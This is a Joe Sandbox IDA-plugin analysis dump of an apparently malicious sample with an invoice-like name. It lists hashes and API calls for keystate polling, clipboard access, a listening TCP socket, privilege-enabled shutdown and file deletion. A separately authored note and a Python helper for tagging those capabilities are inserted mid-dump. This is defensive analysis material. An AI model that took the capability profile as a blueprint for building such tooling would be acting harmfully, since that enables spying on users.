                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 3996160137-0
                                          • Opcode ID: 8b67b5b259a5c20deae35a7c48ad1a60a6c9fb1244de851132298594022b28f1
                                          • Instruction ID: 9f7a1d2b49ad062a4bf5bafd2a6b01299e83cf18a48ac5a6dbde303982bd8b93
                                          • Opcode Fuzzy Hash: 8b67b5b259a5c20deae35a7c48ad1a60a6c9fb1244de851132298594022b28f1
                                          • Instruction Fuzzy Hash: 62613771900209EFDF10DFA5EE84AEEBBB9FF04704F149169E815B7291DB319A45CB60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$PJ$UCP)$UTF)$UTF16)
                                          • API String ID: 0-1331342731
                                          • Opcode ID: 032dfbc88fb354a893d4e223ce064570b288105a712aec9b9ca021711d3ca32e
                                          • Instruction ID: 67380a6c59c81eb1ef8ca265ec46c2af0db5fd325db4819da9ff76d152a396cd
                                          • Opcode Fuzzy Hash: 032dfbc88fb354a893d4e223ce064570b288105a712aec9b9ca021711d3ca32e
                                          • Instruction Fuzzy Hash: D5725E71E002199BDF24DF59D8807EEB7F5EF88314F1491AAE949BB290DB709D81CB90
                                          APIs
                                            • Part of subcall function 00E710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E70038,?,?), ref: 00E710BC
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E70737
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E707D6
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E7086E
                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E70AAD
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E70ABA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                          • String ID:
                                          • API String ID: 1240663315-0
                                          • Opcode ID: 494778d7136fd66164bbf592380ded19574780d3aec87a6720e93a8d855a7598
                                          • Instruction ID: 5aaa674ba5335c01706f793a81a41e9c0a7d98585c5e649bd471fb0c7fb58f81
                                          • Opcode Fuzzy Hash: 494778d7136fd66164bbf592380ded19574780d3aec87a6720e93a8d855a7598
                                          • Instruction Fuzzy Hash: DEE15B71604200EFCB14DF29C891E6ABBE4EF89714F04D56DF94AEB2A2DA30E945CB51
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00E50241
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00E502C2
                                          • GetKeyState.USER32(000000A0), ref: 00E502DD
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00E502F7
                                          • GetKeyState.USER32(000000A1), ref: 00E5030C
                                          • GetAsyncKeyState.USER32(00000011), ref: 00E50324
                                          • GetKeyState.USER32(00000011), ref: 00E50336
                                          • GetAsyncKeyState.USER32(00000012), ref: 00E5034E
                                          • GetKeyState.USER32(00000012), ref: 00E50360
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00E50378
                                          • GetKeyState.USER32(0000005B), ref: 00E5038A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: f9343f05de9e998dfcd8dc493cd56d2cd03d549741de222f61be916277587558
                                          • Instruction ID: 5e4ff99402c6147c6e1898267106da008fa2c09915e53356f540e4369f4ee1b5
                                          • Opcode Fuzzy Hash: f9343f05de9e998dfcd8dc493cd56d2cd03d549741de222f61be916277587558
                                          • Instruction Fuzzy Hash: 424186245047CA6FFF319A64C8083B5BFA06F1234AF48589DEDC6661D3EB945DCC87A2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 364f5095de0d7bfcf6906875e73bf6ee0757976f247d048a25e5c1fc722f920d
                                          • Instruction ID: be606fec9dbf4d63029fc9a152124eac879c47d14957b224afee551189d4fa8b
                                          • Opcode Fuzzy Hash: 364f5095de0d7bfcf6906875e73bf6ee0757976f247d048a25e5c1fc722f920d
                                          • Instruction Fuzzy Hash: F821A1752402119FDB11EF61EC19B6AB7A8EF04754F10802AF90AFB2B1DB74AC40CB95
                                          APIs
                                            • Part of subcall function 00DF48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DF48A1,?,?,00DF37C0,?), ref: 00DF48CE
                                            • Part of subcall function 00E54CD3: GetFileAttributesW.KERNEL32(?,00E53947), ref: 00E54CD4
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E53ADF
                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E53B87
                                          • MoveFileW.KERNEL32(?,?), ref: 00E53B9A
                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E53BB7
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E53BD9
                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E53BF5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 4002782344-1173974218
                                          • Opcode ID: edef731ec6fbbb73f54fa750f8ee9743ed10249f9ac14be1b335dd5eb01e6a8e
                                          • Instruction ID: 1caca28529a009a7f6bf0276761bb3372e3cc2377bd3200c78943b1fe229dcfe
                                          • Opcode Fuzzy Hash: edef731ec6fbbb73f54fa750f8ee9743ed10249f9ac14be1b335dd5eb01e6a8e
                                          • Instruction Fuzzy Hash: FA517E3180514DAACF05EBA0DD929FDB7B8AF14345F2495A9E90677092EF206F0DCB70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                                          • API String ID: 0-3486589167
                                          • Opcode ID: b4e2e310576217790bf3f2180cd63db7ab36b44782f8e8d33954cc97de5ea77c
                                          • Instruction ID: 45bde345ee627a55521ee97c43df9d9886623e0737f33aa851807d92ecfad0e6
                                          • Opcode Fuzzy Hash: b4e2e310576217790bf3f2180cd63db7ab36b44782f8e8d33954cc97de5ea77c
                                          • Instruction Fuzzy Hash: DFA26DF0A0421ACBDF24CF58CA947ADB7B1BB54318F14A1AAE955B72C0E7709EC5CB50
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E5F6AB
                                          • Sleep.KERNEL32(0000000A), ref: 00E5F6DB
                                          • _wcscmp.LIBCMT ref: 00E5F6EF
                                          • _wcscmp.LIBCMT ref: 00E5F70A
                                          • FindNextFileW.KERNEL32(?,?), ref: 00E5F7A8
                                          • FindClose.KERNEL32(00000000), ref: 00E5F7BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                          • String ID: *.*
                                          • API String ID: 713712311-438819550
                                          • Opcode ID: a26572c14fb4533facbac7d3f6dcea1ef39646653f90bdbe8e54a9b5323c3a12
                                          • Instruction ID: 8f9ea6afc946194ef5f18f2a318550bf79a1c3217e5a4177b4d5bd90faa2819e
                                          • Opcode Fuzzy Hash: a26572c14fb4533facbac7d3f6dcea1ef39646653f90bdbe8e54a9b5323c3a12
                                          • Instruction Fuzzy Hash: E841817191020A9FCF11DF64CC45AEEBBB4FF09315F144966E919B71A1EB309E88CBA0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: cb03b15d63dc4800ba36dd12009e51f0759a470ddf1e47ceae7f45f72aac694c
                                          • Instruction ID: b5ad230d70bedebb54e29cbd3cfc506135dffc78cf91ec74ec96528fa53bbd58
                                          • Opcode Fuzzy Hash: cb03b15d63dc4800ba36dd12009e51f0759a470ddf1e47ceae7f45f72aac694c
                                          • Instruction Fuzzy Hash: E212A871A00609DFDF04DFA5E981AEEB7F5FF48300F109269E506B7291EB35A991CB60
                                          APIs
                                            • Part of subcall function 00E10FF6: std::exception::exception.LIBCMT ref: 00E1102C
                                            • Part of subcall function 00E10FF6: __CxxThrowException@8.LIBCMT ref: 00E11041
                                          • _memmove.LIBCMT ref: 00E4062F
                                          • _memmove.LIBCMT ref: 00E40744
                                          • _memmove.LIBCMT ref: 00E407EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                          • String ID: yZ
                                          • API String ID: 1300846289-3798167742
                                          • Opcode ID: 4e825081b9b6f03d23f3402207437505278b798f051749b3e7f4afffee08602a
                                          • Instruction ID: 70fd9d3cf86f7e3b7adf2ecdd8e146287f316eb9dd907969ffa39d17a22c3fde
                                          • Opcode Fuzzy Hash: 4e825081b9b6f03d23f3402207437505278b798f051749b3e7f4afffee08602a
                                          • Instruction Fuzzy Hash: 9D02A271E00209DFCF04DF64E9816AE7BF5EF48300F159069E906EB295EB31D995CBA1
                                          APIs
                                            • Part of subcall function 00E48CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E48D0D
                                            • Part of subcall function 00E48CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E48D3A
                                            • Part of subcall function 00E48CC3: GetLastError.KERNEL32 ref: 00E48D47
                                          • ExitWindowsEx.USER32(?,00000000), ref: 00E5549B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-194228
                                          • Opcode ID: 5cfbb55507412a52b2ecb79c58382dbd94834ee1896cd79c10aae0a8ea2e7094
                                          • Instruction ID: cfabcd086dd154bc06e6adb3f7a8fb8a14a452e74c5eb838318ad6cd9f3547e0
                                          • Opcode Fuzzy Hash: 5cfbb55507412a52b2ecb79c58382dbd94834ee1896cd79c10aae0a8ea2e7094
                                          • Instruction Fuzzy Hash: 6B01FC33655B115EE7285678EC6ABBA7298EB05353F242931FD27F60D3DA501C8C8590
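The function summaries above are raw IDA-plugin output: one bullet per API call, with hex argument tokens and a "?" wherever the plugin could not resolve a value. A triage helper that parses these bullets, decodes the arguments that carry meaning (virtual-key codes passed to GetAsyncKeyState/GetKeyState, the family/type/protocol triple passed to socket) and groups the calls into capability clusters is what an analyst reaches for when reading a dump like this. The block below is an added example written for this page, not Joe Sandbox or AutoIt code; its SAMPLE input is constructed from bullets that appear in this section of the report, the VK_* and socket constants are the standard Windows values, and the capability table is the author's own. One caveat the report itself supports: the sample is flagged as a compiled AutoIt script, so these functions belong to the interpreter's runtime and describe capabilities available to any such script, not necessarily behaviour this sample exercised.

```python
"""Parse Joe Sandbox "APIs" bullets and tag capability clusters.

Added example for this report; not Joe Sandbox code. The SAMPLE text below is
constructed from bullets shown in this section of the report.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: bullets copied from the function summaries on this page.
SAMPLE = """\
• GetKeyboardState.USER32(?), ref: 00E50241
• GetAsyncKeyState.USER32(000000A0), ref: 00E502C2
• GetKeyState.USER32(000000A0), ref: 00E502DD
• GetAsyncKeyState.USER32(00000011), ref: 00E50324
• GetAsyncKeyState.USER32(0000005B), ref: 00E50378
  • Part of subcall function 00E48CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E48D0D
  • Part of subcall function 00E48CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E48D3A
• ExitWindowsEx.USER32(?,00000000), ref: 00E5549B
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E665EF
• bind.WSOCK32(00000000,?,00000010), ref: 00E6661A
• listen.WSOCK32(00000000,00000005), ref: 00E66629
• _wcscmp.LIBCMT ref: 00E5F427
"""

# One bullet: optional "Part of subcall function XXXX:" prefix, Api.MODULE,
# optional "(args)", then "ref: ADDRESS". CRT entries have no parentheses.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_@:][\w@:]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Standard Windows virtual-key codes the report's key-state function polls.
VK_NAMES = {
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
    0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
    0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
    0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU",
}
# Standard Winsock constants for socket(af, type, protocol).
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTO = {0: "IPPROTO_DEFAULT", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

# Author's own capability clusters; a cluster is reported only when every
# member API is present in the parsed list.
CAPABILITIES = {
    "modifier-key polling": {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"},
    "privilege adjustment": {"LookupPrivilegeValueW", "AdjustTokenPrivileges"},
    "shutdown/logoff": {"ExitWindowsEx"},
    "TCP listener": {"socket", "bind", "listen"},
    "clipboard access": {"OpenClipboard", "GetClipboardData", "EmptyClipboard"},
    "DACL rewrite on user object": {"GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity"},
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw tokens; "?" where the plugin could not resolve
    ref: str                   # call-site address
    subcall_of: Optional[str]  # set when the bullet was "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every bullet that matches the report format; skip headings."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def hex_arg(tok: str) -> Optional[int]:
    """Decode a plugin argument token; None for '?' or string literals."""
    try:
        return int(tok, 16)
    except ValueError:
        return None


def describe(call: ApiCall) -> str:
    """Render one call, decoding the arguments whose meaning is known."""
    if call.api in ("GetAsyncKeyState", "GetKeyState") and call.args:
        vk = hex_arg(call.args[0])
        name = "?" if vk is None else VK_NAMES.get(vk, "vk=0x%02X" % vk)
        return f"{call.api}({name})"
    if call.api == "socket" and len(call.args) >= 3:
        af, ty, pr = (hex_arg(a) for a in call.args[:3])
        return f"socket({AF.get(af, af)}, {SOCK.get(ty, ty)}, {PROTO.get(pr, pr)})"
    return f"{call.api}({', '.join(call.args)})"


def tag_capabilities(calls: List[ApiCall]) -> dict:
    """Return {cluster name: sorted member APIs} for fully present clusters."""
    seen = {c.api for c in calls}
    return {name: sorted(apis) for name, apis in CAPABILITIES.items() if apis <= seen}


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        via = f"[via {c.subcall_of}] " if c.subcall_of else ""
        print(f"{c.ref}: {via}{describe(c)}")
    print("capabilities:", tag_capabilities(parsed))
```

Feed it the "APIs" bullets of one function at a time to keep the clusters honest; merging bullets across unrelated functions (as SAMPLE does for demonstration) will report capabilities that no single code path actually combines.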
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __itow__swprintf
                                          • String ID: Oa
                                          • API String ID: 674341424-3945284152
                                          • Opcode ID: e3fd209ab8bd18b8eb5f69392ce862962ab25884f1ee10a5cdfc020c05f66642
                                          • Instruction ID: 9ab4cfb859c31b7b6c2510f923e174a056aa797abc99187f2fc8c21a5e7e093d
                                          • Opcode Fuzzy Hash: e3fd209ab8bd18b8eb5f69392ce862962ab25884f1ee10a5cdfc020c05f66642
                                          • Instruction Fuzzy Hash: 8D228FB15083019FC724DF24C891BAFB7E9EF84704F10991DF996A7291DB71EA44CBA2
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E665EF
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E665FE
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00E6661A
                                          • listen.WSOCK32(00000000,00000005), ref: 00E66629
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E66643
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00E66657
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                          • String ID:
                                          • API String ID: 1279440585-0
                                          • Opcode ID: 12e5bbf68ba7611f17893d4abf7d485b8baf8b5048632536e9b26c7d1aa346c4
                                          • Instruction ID: 5904e69d3e104d068a1cf29266bf1610c9504ea1ad4282bd604ceeeda704088b
                                          • Opcode Fuzzy Hash: 12e5bbf68ba7611f17893d4abf7d485b8baf8b5048632536e9b26c7d1aa346c4
                                          • Instruction Fuzzy Hash: 0521CE316402049FDB00EF24E845B7EB7F9EF44364F158159E91AB72D1CB70AD45CB61
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00DF19FA
                                          • GetSysColor.USER32(0000000F), ref: 00DF1A4E
                                          • SetBkColor.GDI32(?,00000000), ref: 00DF1A61
                                            • Part of subcall function 00DF1290: DefDlgProcW.USER32(?,00000020,?), ref: 00DF12D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ColorProc$LongWindow
                                          • String ID:
                                          • API String ID: 3744519093-0
                                          • Opcode ID: 97a963edf4b9afacfda70e9d71321e5096ad3169da504b9278c364d62d74e5c4
                                          • Instruction ID: 8e706624c694c33962c6c70c478a1067296a30c1702da894c7a876e28b62d731
                                          • Opcode Fuzzy Hash: 97a963edf4b9afacfda70e9d71321e5096ad3169da504b9278c364d62d74e5c4
                                          • Instruction Fuzzy Hash: 1BA1AC7810549DFED638AB29AC45DBF369CDB42345F2ED20AF752F6192CE14CC0292B1
                                          APIs
